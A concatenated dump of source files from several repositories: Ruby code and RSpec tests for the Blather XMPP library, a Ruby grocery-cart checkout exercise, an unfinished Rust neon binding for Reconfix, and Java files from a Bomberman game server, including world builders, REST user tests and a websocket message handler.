configure_node.namespace = self.pubsub.namespace
end
configure_node
end
end # Create
end # PubSub
end # Stanza
end # Blather
<file_sep>/spec/blather/stanza/iq/vcard_spec.rb
require 'spec_helper'
def vcard_xml
<<-XML
<iq type="result" id="blather0007" to="<EMAIL>">
<vCard xmlns="vcard-temp">
<NICKNAME>Romeo</NICKNAME>
</vCard>
</iq>
XML
end
describe Blather::Stanza::Iq::Vcard do
it 'registers itself' do
expect(Blather::XMPPNode.class_from_registration(:vCard, 'vcard-temp')).to eq(Blather::Stanza::Iq::Vcard)
end
it 'can be imported' do
query = Blather::XMPPNode.parse vcard_xml
expect(query).to be_instance_of Blather::Stanza::Iq::Vcard
expect(query.vcard).to be_instance_of Blather::Stanza::Iq::Vcard::Vcard
end
it 'ensures a vcard node is present on create' do
query = Blather::Stanza::Iq::Vcard.new
expect(query.xpath('ns:vCard', :ns => 'vcard-temp')).not_to be_empty
end
it 'ensures a vcard node exists when calling #vcard' do
query = Blather::Stanza::Iq::Vcard.new
query.vcard.remove
expect(query.xpath('ns:vCard', :ns => 'vcard-temp')).to be_empty
expect(query.vcard).not_to be_nil
expect(query.xpath('ns:vCard', :ns => 'vcard-temp')).not_to be_empty
end
it 'ensures a vcard node is replaced when calling #vcard=' do
query = Blather::XMPPNode.parse vcard_xml
new_vcard = Blather::Stanza::Iq::Vcard::Vcard.new
new_vcard["NICKNAME"] = 'Mercutio'
query.vcard = new_vcard
expect(query.xpath('ns:vCard', :ns => 'vcard-temp').size).to eq(1)
expect(query.find_first('ns:vCard/ns:NICKNAME', :ns => 'vcard-temp').content).to eq('Mercutio')
end
end
describe Blather::Stanza::Iq::Vcard::Vcard do
it 'can set vcard elements' do
query = Blather::Stanza::Iq::Vcard.new :set
query.vcard['NICKNAME'] = 'Romeo'
expect(query.find_first('ns:vCard/ns:NICKNAME', :ns => 'vcard-temp').content).to eq('Romeo')
end
it 'can set deep vcard elements' do
query = Blather::Stanza::Iq::Vcard.new :set
query.vcard['PHOTO/TYPE'] = 'image/png'
query.vcard['PHOTO/BINVAL'] = '===='
expect(query.find_first('ns:vCard/ns:PHOTO', :ns => 'vcard-temp').children.size).to eq(2)
expect(query.find_first('ns:vCard/ns:PHOTO', :ns => 'vcard-temp').children.detect { |n| n.element_name == 'TYPE' && n.content == 'image/png' }).not_to be_nil
expect(query.find_first('ns:vCard/ns:PHOTO', :ns => 'vcard-temp').children.detect { |n| n.element_name == 'BINVAL' && n.content == '====' }).not_to be_nil
end
it 'can get vcard elements' do
query = Blather::Stanza::Iq::Vcard.new :set
query.vcard['NICKNAME'] = 'Romeo'
expect(query.vcard['NICKNAME']).to eq('Romeo')
end
it 'can get deep vcard elements' do
query = Blather::Stanza::Iq::Vcard.new :set
query.vcard['PHOTO/TYPE'] = 'image/png'
query.vcard['PHOTO/BINVAL'] = '===='
expect(query.vcard['PHOTO/TYPE']).to eq('image/png')
expect(query.vcard['PHOTO/BINVAL']).to eq('====')
end
it 'returns nil on vcard elements which does not exist' do
query = Blather::Stanza::Iq::Vcard.new :set
query.vcard['NICKNAME'] = 'Romeo'
expect(query.vcard['FN']).to be_nil
end
it 'can update vcard elements' do
query = Blather::XMPPNode.parse vcard_xml
expect(query.vcard['NICKNAME']).to eq('Romeo')
query.vcard['NICKNAME'] = 'Mercutio'
expect(query.vcard['NICKNAME']).to eq('Mercutio')
end
end
<file_sep>/lib/blather/stream/features.rb
module Blather
class Stream
# @private
class Features
@@features = {}
def self.register(ns)
@@features[ns] = self
end
def self.from_namespace(ns)
@@features[ns]
end
def initialize(stream, succeed, fail)
@stream, @succeed, @fail = stream, succeed, fail
end
def receive_data(stanza)
if @feature
@feature.receive_data stanza
else
@features ||= stanza
next!
end
end
def next!
if starttls = @features.at_xpath("tls:starttls",{"tls" => "urn:ietf:params:xml:ns:xmpp-tls"})
@feature = TLS.new(@stream, nil, @fail)
@feature.receive_data(starttls)
return
end
bind = @features.at_xpath('ns:bind', ns: 'urn:ietf:params:xml:ns:xmpp-bind')
session = @features.at_xpath('ns:session', ns: 'urn:ietf:params:xml:ns:xmpp-session')
if bind && session && @features.children.last != session
bind.after session
end
@idx = @idx ? @idx+1 : 0
if stanza = @features.children[@idx]
if stanza.namespaces['xmlns'] && (klass = self.class.from_namespace(stanza.namespaces['xmlns']))
@feature = klass.new(
@stream,
proc {
if (klass == Blather::Stream::Register && stanza = feature?(:mechanisms))
@idx = @features.children.index(stanza)
@feature = Blather::Stream::SASL.new @stream, proc { next! }, @fail
@feature.receive_data stanza
else
next!
end
},
(klass == Blather::Stream::SASL && feature?(:register)) ? proc { next! } : @fail
)
@feature.receive_data stanza
else
next!
end
else
succeed!
end
end
def succeed!
@succeed.call
end
def fail!(msg)
@fail.call msg
end
def feature?(feature)
@features && @features.children.find { |v| v.element_name == feature.to_s }
end
end
end #Stream
end #Blather
<file_sep>/spec/blather/stanza/pubsub/retract_spec.rb
require 'spec_helper'
require 'fixtures/pubsub'
describe Blather::Stanza::PubSub::Retract do
it 'registers itself' do
expect(Blather::XMPPNode.class_from_registration(:retract, 'http://jabber.org/protocol/pubsub')).to eq(Blather::Stanza::PubSub::Retract)
end
it 'can be imported' do
expect(Blather::XMPPNode.parse(retract_xml)).to be_instance_of Blather::Stanza::PubSub::Retract
end
it 'ensures an retract node is present on create' do
retract = Blather::Stanza::PubSub::Retract.new
expect(retract.find('//ns:pubsub/ns:retract', :ns => Blather::Stanza::PubSub.registered_ns)).not_to be_empty
end
it 'ensures an retract node exists when calling #retract' do
retract = Blather::Stanza::PubSub::Retract.new
retract.pubsub.remove_children :retract
expect(retract.find('//ns:pubsub/ns:retract', :ns => Blather::Stanza::PubSub.registered_ns)).to be_empty
expect(retract.retract).not_to be_nil
expect(retract.find('//ns:pubsub/ns:retract', :ns => Blather::Stanza::PubSub.registered_ns)).not_to be_empty
end
it 'defaults to a set node' do
retract = Blather::Stanza::PubSub::Retract.new
expect(retract.type).to eq(:set)
end
it 'sets the host if requested' do
retract = Blather::Stanza::PubSub::Retract.new 'pubsub.jabber.local'
expect(retract.to).to eq(Blather::JID.new('pubsub.jabber.local'))
end
it 'sets the node' do
retract = Blather::Stanza::PubSub::Retract.new 'host', 'node-name'
expect(retract.node).to eq('node-name')
end
it 'can set the retractions as a string' do
retract = Blather::Stanza::PubSub::Retract.new 'host', 'node'
retract.retractions = 'id1'
expect(retract.xpath('//ns:retract[ns:item[@id="id1"]]', :ns => Blather::Stanza::PubSub.registered_ns)).not_to be_empty
end
it 'can set the retractions as an array' do
retract = Blather::Stanza::PubSub::Retract.new 'host', 'node'
retract.retractions = %w[id1 id2]
expect(retract.xpath('//ns:retract[ns:item[@id="id1"] and ns:item[@id="id2"]]', :ns => Blather::Stanza::PubSub.registered_ns)).not_to be_empty
end
it 'will iterate over each item' do
retract = Blather::Stanza::PubSub::Retract.new.inherit parse_stanza(retract_xml).root
expect(retract.retractions.size).to eq(1)
expect(retract.size).to eq(retract.retractions.size)
expect(retract.retractions).to eq(%w[ae890ac52d0df67ed7cfdf51b644e901])
end
it 'has a node attribute' do
retract = Blather::Stanza::PubSub::Retract.new
expect(retract).to respond_to :node
expect(retract.node).to be_nil
retract.node = 'node-name'
expect(retract.node).to eq('node-name')
expect(retract.xpath('//ns:retract[@node="node-name"]', :ns => Blather::Stanza::PubSub.registered_ns)).not_to be_empty
end
it 'will iterate over each retraction' do
Blather::XMPPNode.parse(retract_xml).each do |i|
expect(i).to include "ae890ac52d0df67ed7cfdf51b644e901"
end
end
end
<file_sep>/lib/blather/stanza/pubsub/publish.rb
module Blather
class Stanza
class PubSub
# # PubSub Publish Stanza
#
# [XEP-0060 Section 7.1 - Publish an Item to a Node](http://xmpp.org/extensions/xep-0060.html#publisher-publish)
#
# @handler :pubsub_publish
class Publish < PubSub
register :pubsub_publish, :publish, self.registered_ns
include Enumerable
alias_method :find, :xpath
# Create a new publish node
#
# @param [String, nil] host the host to pushlish the node to
# @param [String, nil] node the name of the node to publish to
# @param [Blather::Stanza::Iq::VALID_TYPES] type the node type
# @param [#to_s] payload the payload to publish see {#payload=}
def self.new(host = nil, node = nil, type = :set, payload = nil)
new_node = super(type, host)
new_node.node = node
new_node.payload = payload if payload
new_node
end
# Set the payload to publish
#
# @overload payload=(hash)
# Set the payload as a set of ID => payload entries
# @param [Hash<id => payload>] hash
# @overload payload=(array)
# Set the list of payloads all at once
# @param [Array<#to_s>] array
# @overload payload=(string)
# Set the payload as a string
# @param [#to_s] string
def payload=(payload)
payload = case payload
when Hash then payload.to_a
when Array then payload.map { |v| [nil, v] }
else [[nil, payload]]
end
payload.each do |id, value|
self.publish << PubSubItem.new(id, value, self.document)
end
end
# Get the name of the node to publish to
#
# @return [String, nil]
def node
publish[:node]
end
# Set the name of the node to publish to
#
# @param [String, nil] node
def node=(node)
publish[:node] = node
end
# Get or create the actual publish node
#
# @return [Blather::XMPPNode]
def publish
unless publish = pubsub.find_first('ns:publish', :ns => self.class.registered_ns)
self.pubsub << (publish = XMPPNode.new('publish', self.document))
publish.namespace = self.pubsub.namespace
end
publish
end
# Get the list of items
#
# @return [Array<Blather::Stanza::PubSub::PubSubItem>]
def items
publish.find('ns:item', :ns => self.class.registered_ns).map do |i|
PubSubItem.new(nil,nil,self.document).inherit i
end
end
# Iterate over the list of items
#
# @yield [item] a block to accept each item
# @yieldparam [Blather::Stanza::PubSub::PubSubItem]
def each(&block)
items.each &block
end
# Get the size of the items list
#
# @return [Fixnum]
def size
items.size
end
end # Publish
end # PubSub
end # Stanza
end # Blather
| 6fd6c5b0413117acbb17c76da8baa16fbbd46508 | [
"Markdown",
"Ruby"
] | 121 | Ruby | adhearsion/blather | 03f9cda14ed3f93a80504c2538cd514d6b025d04 | 63011364c43bec00cee2d73757fd220e5576bad2 |
refs/heads/master | <file_sep>require 'pry'
def consolidate_cart(cart)
# code here
consolidated = {}
count = Hash.new(0)
cart.each do |element|
consolidated[element.keys[0]] = element.values[0]
count[element.keys[0]] += 1
end
count.each do |key, value|
consolidated[key][:count] = value
end
consolidated
end
def apply_coupons(cart, coupons)
# code here
coupons.each do |element|
if cart.keys.include?(element[:item])
element[:clearance] = cart[element[:item]][:clearance]
output_name = element[:item] + " W/COUPON"
if cart.keys.include?(output_name)
element[:count] = cart[output_name][:count]
else
element[:count] = 0
end
if cart[element[:item]][:count] >= element[:num]
cart[element[:item]][:count] -= element[:num]
element[:count] += 1
end
cart[output_name] = {}
cart[output_name][:count] = element[:count]
cart[output_name][:price]= element[:cost]
cart[output_name][:clearance] = element[:clearance]
end
end
cart
end
def apply_clearance(cart)
# code here
cart.each do |key, value|
if value[:clearance] == true
value[:price] = (value[:price] * 0.8).round(2)
end
end
cart
end
def checkout(cart, coupons)
# code here
cart = consolidate_cart(cart)
cart = apply_coupons(cart, coupons)
cart = apply_clearance(cart)
total = 0.0
cart.each do |key, value|
total += value[:price] * value[:count]
end
if total.to_f > 100
total = (total.to_f * 0.9).round(2)
end
total
end
| acb1dd176de7ff2414988d51e746682fefc6a8b6 | [
"Ruby"
] | 1 | Ruby | someotherkyle/green_grocer-online-web-prework | c72611863c7579b903b3ca554f5cc648ddfd0248 | ec4486d9b66a9884b18fbdb7fb09de56255c05b2 |
refs/heads/master | <repo_name>abrodersen/node-reconfix<file_sep>/native/src/lib.rs
#[macro_use]
extern crate neon;
extern crate reconfix;
use neon::vm::{Call, JsResult, Lock};
use neon::js::{JsString, JsNumber, JsObject, JsFunction, JsNull};
use neon::mem::Handle;
use neon::scope::{Scope, RootScope, ChainedScope};
use std::io;
use std::mem;
use std::result;
use std::error;
use std::cell::RefCell;
use std::ops::DerefMut;
use reconfix::{Reconfix, Plugin, FileNode, Content};
struct CallbackPlugin<'a>
{
scope: &'a mut RootScope<'a>,
callback: Handle<'a, JsFunction>,
}
impl<'a> Plugin<'a, 'a, StreamWrapper<'a>> for CallbackPlugin<'a>
{
fn open(&'a mut self, file: &FileNode) -> result::Result<StreamWrapper<'a>, Box<error::Error + Send + Sync>> {
let partition = JsNumber::new(self.scope, file.partition.num() as f64);
let path = &file.path;
let stream = self.callback.call(self.scope, JsNull::new(), vec![partition])
.and_then(|v| v.check::<JsObject>())
.map_err(|e| Box::new(e))?;
let wrapper = StreamWrapper {
plugin: self,
stream: stream,
};
Ok(wrapper)
}
}
struct StreamWrapper<'a>
{
plugin: &'a mut CallbackPlugin<'a>,
stream: Handle<'a, JsObject>,
}
impl<'a> io::Read for StreamWrapper<'a> {
fn read(&mut self, buf: &mut [u8]) -> io::Result<usize> {
Ok(0)
}
}
impl<'a> io::Write for StreamWrapper<'a> {
fn write(&mut self, buf: &[u8]) -> io::Result<usize> {
Ok(0)
}
fn flush(&mut self) -> io::Result<()> {
Ok(())
}
}
impl<'a> Content for StreamWrapper<'a> {}
pub struct ReconfixWrapper {
reconfix: Reconfix,
}
declare_types! {
pub class JsReconfix for ReconfixWrapper {
init(call) {
let scope = call.scope;
// let open = call.arguments.require(scope, 0)?.check::<JsFunction>()?;
// let escaped = scope.chained(move |&mut scope| {
// scope.escape(open)
// });
// let plugin = CallbackPlugin {
// scope: None,
// callback: escaped,
// };
let reconfix = Reconfix::new();
Ok(ReconfixWrapper {
//plugin: plugin,
reconfix: reconfix,
})
}
method read_values(call) {
let scope = call.scope;
let callback = call.arguments.require(scope, 0)?.check::<JsFunction>()?;
let reconfix = call.arguments.this(scope).grab(|w| w.reconfix);
let plugin = CallbackPlugin { scope: scope, callback: callback };
let result = reconfix.read_values_plugin(plugin);
Ok(JsNull::new().upcast())
}
}
}
fn hello(call: Call) -> JsResult<JsString> {
let scope = call.scope;
Ok(JsString::new(scope, "hello node").unwrap())
}
register_module!(m, {
m.export("hello", hello)
});
<file_sep>/native/Cargo.toml
[package]
name = "node-reconfix"
version = "0.1.0"
authors = ["<NAME> <<EMAIL>>"]
license = "MIT"
build = "build.rs"
[lib]
name = "node_reconfix"
crate-type = ["dylib"]
[build-dependencies]
neon-build = "0.1.20"
[dependencies]
neon = "0.1.20"
[dependencies.reconfix]
path = "../../reconfix"
<file_sep>/README.md
# node-reconfix
A Node.js wrapper for the Reconfix library.
| a206ae3acaf85213ec575265e74009d88225f51c | [
"TOML",
"Rust",
"Markdown"
] | 3 | Rust | abrodersen/node-reconfix | 4c3b1612ef6cfbf06519d757d39ccf54e082a041 | 0578d06f47b2832b5b5fce5cc999a68a297694aa |
refs/heads/master | <repo_name>VitalyNikolaev/2016-02-2d<file_sep>/src/main/java/bomberman/mechanics/tiles/behaviors/NullBehavior.java
package bomberman.mechanics.tiles.behaviors;
import bomberman.mechanics.World;
public class NullBehavior extends ActionTileAbstractBehavior {
public NullBehavior(World eventList) {
super(eventList);
}
@Override
public void behave(long deltaT) {
// T_T
}
}
<file_sep>/src/main/java/bomberman/mechanics/worldbuilders/TextWorldBuilderV11.java
package bomberman.mechanics.worldbuilders;
import bomberman.mechanics.TileFactory;
import bomberman.mechanics.World;
import bomberman.mechanics.interfaces.EntityType;
import bomberman.mechanics.interfaces.ITile;
import bomberman.mechanics.interfaces.IWorldBuilder;
import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;
import org.jetbrains.annotations.Nullable;
import java.io.BufferedReader;
import java.io.File;
import java.io.FileReader;
import java.io.IOException;
import java.util.*;
////
////
// Difference from v1.0:
// * Undestructible wall is 'x' now instead of '#'. Easier to type.
// * World dimensions are now variable, but world is still square.
////
////
public class TextWorldBuilderV11 implements IWorldBuilder {
public static Map<String, IWorldBuilder> getAllTextBuilders() {
final HashMap<String, IWorldBuilder> builders = new HashMap<>();
final File[] worldBlueprints = new File("data/worlds").listFiles();
if (worldBlueprints == null)
LOGGER.fatal("Cannot access world blueprints folder or it is empty!");
else
for (final File blueprint : worldBlueprints)
if (!blueprint.isDirectory())
try {
final String nameWithoutExtension = blueprint.getName().substring(0, blueprint.getName().lastIndexOf('.'));
builders.put(nameWithoutExtension, new TextWorldBuilderV11(blueprint));
} catch (Exception ex) {
LOGGER.info("Cannot build world from file\"" + blueprint.getAbsolutePath() + "\". Ignoring.");
}
return builders;
}
@SuppressWarnings("OverlyBroadThrowsClause")
public TextWorldBuilderV11(File blueprint) throws Exception {
BufferedReader strings = null;
//noinspection OverlyBroadCatchBlock
try {
//noinspection resource,IOResourceOpenedButNotSafelyClosed
strings = new BufferedReader(new FileReader(blueprint));
if (!strings.readLine().equals(CURRENT_VERSION))
throw new Exception();
name = strings.readLine();
String newLine = strings.readLine();
rawTiles.add(newLine); // 1st line of tiles specifies world width.
boolean reachedEOF = false;
while (!reachedEOF) {
newLine = strings.readLine();
if (newLine.equals(EOF_TAG) || newLine.length() != rawTiles.get(0).length())
reachedEOF = true;
else
rawTiles.add(newLine);
}
if (rawTiles.size() == MIN_HEIGHT || rawTiles.get(0).length() == MIN_WIDTH) {
LOGGER.error("World \"" + blueprint.getAbsolutePath() + "\" is too small! Make it at least " + MIN_WIDTH + 'x' + MIN_HEIGHT + '.');
}
} catch (IOException ex) {
LOGGER.error("Cannot read\"" + blueprint.getAbsolutePath() + "\" due to some weird reason! Check server's rights.");
throw ex;
} catch (Exception ex) {
LOGGER.info("World \"" + blueprint.getAbsolutePath() + "\" has version different version than " + CURRENT_VERSION);
throw ex;
} finally {
if (strings != null)
try {
strings.close();
} catch (IOException e) {
LOGGER.info(e);
}
}
}
@Override
public synchronized WorldData getWorldData(World newSupplicant) {
supplicant = newSupplicant;
generateWorldFromText();
isFirstTimeRun = false;
return new WorldData(tileArray, getBombermenSpawns(), name);
}
private float[][] getBombermenSpawns() {
final float[][] spawnArray = new float[spawnList.size()][2]; // 2 for x and y coordinates
int i = 0;
for(float[] onePoint : spawnList)
{
spawnArray[i] = onePoint;
i++;
}
return spawnArray;
}
private void generateWorldFromText() {
tileArray = new ITile[rawTiles.size()][rawTiles.get(0).length()];
int y = 0;
for (String row : rawTiles) {
int x = 0;
for (char tileChar : row.toCharArray())
{
tileArray[y][x] = mapSymbolToTile(tileChar, x, y);
x++;
}
y++;
}
}
@SuppressWarnings({"MagicNumber", "OverlyComplexMethod"})
@Nullable
private ITile mapSymbolToTile(char c, int x, int y){
switch (c)
{
case '.':
return null;
case 'x':
return TileFactory.getInstance().getNewTile(EntityType.UNDESTRUCTIBLE_WALL, supplicant.getNextID());
case 'd':
return TileFactory.getInstance().getNewTile(EntityType.DESTRUCTIBLE_WALL, supplicant.getNextID());
case 'P':
return TileFactory.getInstance().getNewTile(EntityType.BONUS_DECBOMBSPAWN, supplicant, supplicant.getNextID());
case 'R':
return TileFactory.getInstance().getNewTile(EntityType.BONUS_INCMAXRANGE, supplicant, supplicant.getNextID());
case 'H':
return TileFactory.getInstance().getNewTile(EntityType.BONUS_DROPBOMBONDEATH, supplicant, supplicant.getNextID());
case 'M':
return TileFactory.getInstance().getNewTile(EntityType.BONUS_MOREBOMBS, supplicant, supplicant.getNextID());
case 'U':
return TileFactory.getInstance().getNewTile(EntityType.BONUS_INCMAXHP, supplicant, supplicant.getNextID());
case 'F':
return TileFactory.getInstance().getNewTile(EntityType.BONUS_INCSPEED, supplicant, supplicant.getNextID());
case 'I':
return TileFactory.getInstance().getNewTile(EntityType.BONUS_INVUL, supplicant, supplicant.getNextID());
case 'S':
if (isFirstTimeRun)
spawnList.add(new float[]{x + 0.5f, y + 0.5f});
return null;
default:
LOGGER.warn("Found undocumented symbol '" + c + "'. Treating him like an empty place.");
return null;
}
}
private World supplicant;
private ITile[][] tileArray;
private final Queue<float[]> spawnList = new LinkedList<>();
private boolean isFirstTimeRun = true;
private String name = "REPORT AS A BUG";
private final ArrayList<String> rawTiles = new ArrayList<>(32);
private static final Logger LOGGER = LogManager.getLogger(TextWorldBuilderV11.class);
private static final String CURRENT_VERSION = "v1.1";
private static final String EOF_TAG = "#EOF";
private static final int MIN_WIDTH = 2;
private static final int MIN_HEIGHT = 2;
}
<file_sep>/src/main/java/bomberman/mechanics/interfaces/Updateable.java
package bomberman.mechanics.interfaces;
public interface Updateable {
void update(long deltaT);
}
<file_sep>/src/test/java/rest/UsersTest.java
package rest;
import constants.Constants;
import main.accountservice.AccountService;
import main.UserTokenManager;
import main.config.Context;
import org.glassfish.hk2.utilities.binding.AbstractBinder;
import org.glassfish.jersey.server.ResourceConfig;
import org.glassfish.jersey.test.JerseyTest;
import org.javatuples.Pair;
import org.javatuples.Triplet;
import org.json.JSONObject;
import org.junit.Before;
import org.junit.BeforeClass;
import org.junit.Test;
import javax.servlet.http.HttpServletRequest;
import javax.ws.rs.core.*;
import java.util.HashMap;
import java.util.Map;
import java.util.Properties;
import static org.junit.Assert.assertEquals;
import static org.junit.Assert.fail;
import static org.mockito.Mockito.mock;
public class UsersTest extends JerseyTest {
@Test
public void testOkCreateUser() {
testCreateUser(RequestFactory.getCreateUserTestData(RequestFactory.CreateUserType.CREATE_OK), true);
}
@Test
public void testAlreadyExistsCreateUser() {
testCreateUser(RequestFactory.getCreateUserTestData(RequestFactory.CreateUserType.CREATE_USER_EXISTS), false);
}
@Test
public void testOkGetUserByID() {
testGetUserByID(RequestFactory.getUserByIDTestData(RequestFactory.GetByIDType.GET_BY_ID_OK));
}
@Test
public void testNoUserGetUserByID() {
testGetUserByID(RequestFactory.getUserByIDTestData(RequestFactory.GetByIDType.GET_BY_WRONG_ID));
}
@Test
public void testOkUpdateUser() {
testUpdateUser(RequestFactory.getUpdateUserTestData(RequestFactory.UpdateUserType.UPDATE_OK));
}
@Test
public void testWrongCookieUpdateUser() {
testUpdateUser(RequestFactory.getUpdateUserTestData(RequestFactory.UpdateUserType.UPDATE_ANOTHER_USER));
}
@Test
public void testOkDeleteUser() {
testDeleteUser(RequestFactory.getDeleteUserTestData(RequestFactory.DeleteUserType.DELETE_OK));
}
@Test
public void testNoCookieDeleteUser() {
testDeleteUser(RequestFactory.getDeleteUserTestData(RequestFactory.DeleteUserType.DELETE_NOT_LOGGED));
}
@Test
public void testAnotherUserDeleteUser() {
testDeleteUser(RequestFactory.getDeleteUserTestData(RequestFactory.DeleteUserType.DELETE_ANOTHER_USER));
}
@Before
public void setContext() {
users.setContext(CONTEXT);
}
@BeforeClass
public static void makeContext() throws InstantiationException {
final AccountService mockedAccountService = Constants.RestApplicationMocks.getMockedAccountService();
CONTEXT.put(AccountService.class, mockedAccountService);
final Map<String, String> properties = new HashMap<>(3);
properties.put("static_path", "static/");
properties.put("userpic_width", "80");
properties.put("userpic_height", "80");
CONTEXT.put(Properties.class, properties);
}
public void testCreateUser(Triplet<String, HttpHeaders, Response> data, boolean shouldHaveCookie){
final Response response = users.createUser(data.getValue0(), data.getValue1());
assertEquals(data.getValue2().toString(), response.toString());
assertEquals(data.getValue2().getEntity().toString(), response.getEntity().toString());
if (shouldHaveCookie)
assertEquals(SID, response.getCookies().get(UserTokenManager.COOKIE_NAME).getValue());
else
assertEquals(false, response.getCookies().containsKey(UserTokenManager.COOKIE_NAME));
}
public void testGetUserByID(Pair<Long, Response> data) {
final Response response = users.getUserByID(data.getValue0());
assertEquals(data.getValue1().toString(), response.toString());
assertEquals(data.getValue1().getEntity().toString(), response.getEntity().toString());
}
public void testUpdateUser(Triplet<String, HttpHeaders, Response> data) {
final Response response = users.updateUser(data.getValue0(), data.getValue1());
assertEquals(data.getValue2().toString(), response.toString());
assertEquals(data.getValue2().getEntity().toString(), response.getEntity().toString());
}
public void testDeleteUser(Triplet<Long, HttpHeaders, Response> data) {
final Response response = users.deleteUser(data.getValue0(), data.getValue1());
assertEquals(data.getValue2().toString(), response.toString());
assertEquals(data.getValue2().getEntity().toString(), response.getEntity().toString());
}
// A bit of magic, without which nothing works.
@Override
protected Application configure() {
//noinspection OverlyBroadCatchBlock
try {
final ResourceConfig config = new ResourceConfig(Sessions.class);
final HttpServletRequest request = mock(HttpServletRequest.class);
//noinspection AnonymousInnerClassMayBeStatic
config.register(new AbstractBinder() {
@Override
protected void configure() {
bind(CONTEXT);
bind(request).to(HttpServletRequest.class);
}
});
config.getInstances();
return config;
} catch (Exception ex) {
ex.printStackTrace();
fail();
}
return null;
}
private static class RequestFactory {
public static Triplet<String, HttpHeaders, Response> getCreateUserTestData(CreateUserType type){
switch (type)
{
case CREATE_OK:
return Triplet.with(okCreateJSON(), NO_COOKIE_HEADERS, okCreateResponse());
case CREATE_USER_EXISTS:
return Triplet.with(wrongCreateJSON(), NO_COOKIE_HEADERS, userExistsCreateResponse());
}
throw new IllegalArgumentException();
}
public static Pair<Long, Response> getUserByIDTestData(GetByIDType type) {
switch (type) {
case GET_BY_ID_OK:
return Pair.with(ID, okGetByIDResponse());
case GET_BY_WRONG_ID:
return Pair.with(0L, wrongGetByIDResponse());
}
throw new IllegalArgumentException();
}
public static Triplet<String, HttpHeaders, Response> getUpdateUserTestData(UpdateUserType type) {
switch (type) {
case UPDATE_OK:
return Triplet.with(okUpdateJSON(), OK_COOKIE_HEADERS, okUpdateResponse());
case UPDATE_ANOTHER_USER:
return Triplet.with(okUpdateJSON(), WRONG_COOKIE_HEADERS, wrongUpdateResponse());
}
throw new IllegalArgumentException();
}
public static Triplet<Long, HttpHeaders, Response> getDeleteUserTestData(DeleteUserType type) {
switch (type) {
case DELETE_OK:
return Triplet.with(ID, OK_COOKIE_HEADERS, okDeleteResponse());
case DELETE_ANOTHER_USER:
return Triplet.with(0L, OK_COOKIE_HEADERS, wrongUserDeleteResponse());
case DELETE_NOT_LOGGED:
return Triplet.with(ID, NO_COOKIE_HEADERS, noCookieDeleteResponse());
}
throw new IllegalArgumentException();
}
private static String okCreateJSON() {
return new JSONObject().put("login", LOGIN).put("password", <PASSWORD>).toString();
}
private static String wrongCreateJSON() {
return new JSONObject().put("login", PASSWORD).put("password", LOGIN).toString(); // Supposing this user is already registered;
}
private static Response okCreateResponse() {
return Response.ok(new JSONObject().put("id", ID).toString()).build();
}
private static Response userExistsCreateResponse() {
return WebErrorManager.accessForbidden("User already exists!");
}
private static Response okGetByIDResponse() {
return Response.ok(new JSONObject().put("id", ID).put("login", LOGIN).put("score", 0L).toString()).build();
}
private static Response wrongGetByIDResponse() {
return WebErrorManager.accessForbidden();
}
private static String okUpdateJSON() {
return new JSONObject().put("login", LOGIN).put("password", <PASSWORD>).toString();
}
private static Response okUpdateResponse() {
return Response.ok(new JSONObject().put("id", ID).toString()).build();
}
private static Response wrongUpdateResponse() {
return WebErrorManager.authorizationRequired("Not logged in!");
}
private static Response okDeleteResponse() {
return WebErrorManager.ok();
}
private static Response wrongUserDeleteResponse() {
return WebErrorManager.accessForbidden("Not your user!");
}
private static Response noCookieDeleteResponse() {
return WebErrorManager.authorizationRequired("Not logged in!");
}
@SuppressWarnings("InnerClassTooDeeplyNested")
public enum CreateUserType {CREATE_OK, CREATE_USER_EXISTS}
@SuppressWarnings("InnerClassTooDeeplyNested")
public enum GetByIDType {GET_BY_ID_OK, GET_BY_WRONG_ID}
@SuppressWarnings("InnerClassTooDeeplyNested")
public enum UpdateUserType {UPDATE_OK, UPDATE_ANOTHER_USER}
@SuppressWarnings("InnerClassTooDeeplyNested")
public enum DeleteUserType {DELETE_OK, DELETE_ANOTHER_USER, DELETE_NOT_LOGGED}
}
private static final Context CONTEXT = new Context();
private final Users users = new Users();
private static final HttpHeaders NO_COOKIE_HEADERS = Constants.RestApplicationMocks.getNoCookieHeaders();
private static final HttpHeaders OK_COOKIE_HEADERS = Constants.RestApplicationMocks.getOkCookieHeaders();
private static final HttpHeaders WRONG_COOKIE_HEADERS = Constants.RestApplicationMocks.getWrongCookieHeaders();
@SuppressWarnings("ConstantNamingConvention")
private static final long ID = Constants.USER_ID;
private static final String LOGIN = Constants.USER_LOGIN;
private static final String PASSWORD = <PASSWORD>;
private static final String SID = Constants.USER_SESSION_ID;
}
<file_sep>/src/main/java/bomberman/mechanics/tiles/behaviors/ActionTileAbstractBehavior.java
package bomberman.mechanics.tiles.behaviors;
import bomberman.mechanics.World;
import bomberman.mechanics.tiles.ActionTile;
public abstract class ActionTileAbstractBehavior {
public ActionTileAbstractBehavior(World eventList)
{
this.eventList = eventList;
}
public void linkWithTile(ActionTile newOwner)
{
owner = newOwner;
}
public abstract void behave(long deltaT);
protected ActionTile owner;
protected final World eventList;
}
<file_sep>/src/main/java/bomberman/mechanics/interfaces/Ownable.java
package bomberman.mechanics.interfaces;
import bomberman.mechanics.Bomberman;
public interface Ownable {
Bomberman getOwner();
}
<file_sep>/cfg/server.properties
port = 80
host = localhost
db_type = hash<file_sep>/src/main/java/bomberman/service/ReceivedMessageHandler.java
package bomberman.service;
import org.json.JSONObject;
import rest.UserProfile;
import rest.WebErrorManager;
public class ReceivedMessageHandler /*implements Runnable*/ {
public ReceivedMessageHandler(UserProfile userProfile, Room userRoom, JSONObject jsonMessage) {
room = userRoom;
message = jsonMessage;
user = userProfile;
}
public boolean execute() {
final String messageType = message.getString("type");
if (!messageType.equals("ping"))
room.refreshUserKickTimer(user);
if (messageType.equals("object_changed")) {
if( WebErrorManager.showFieldsNotPresent(message, "x", "y") != null)
return false;
else
room.scheduleBombermanMovement(user, message.getInt("x"), message.getInt("y"));
return true;
}
if (messageType.equals("bomb_spawned")) {
room.scheduleBombPlacement(user);
return true;
}
if (messageType.equals("user_state_changed")) {
if (WebErrorManager.showFieldsNotPresent(message, "isReady", "contentLoaded") != null)
return false;
else
room.updatePlayerState(user, message.getBoolean("isReady"), message.getBoolean("contentLoaded"));
return true;
}
if (messageType.equals("chat_message")) {
if (WebErrorManager.showFieldsNotPresent(message, "user_id", "text") != null)
return false;
room.broadcast(message.toString());
return true;
}
if (messageType.equals("enable_bots")) {
if (WebErrorManager.showFieldsNotPresent(message, "value") != null)
return false;
room.activateBots(message.getBoolean("value"));
return true;
}
//noinspection RedundantIfStatement
if (messageType.equals("ping")) {
return true;
}
return false;
}
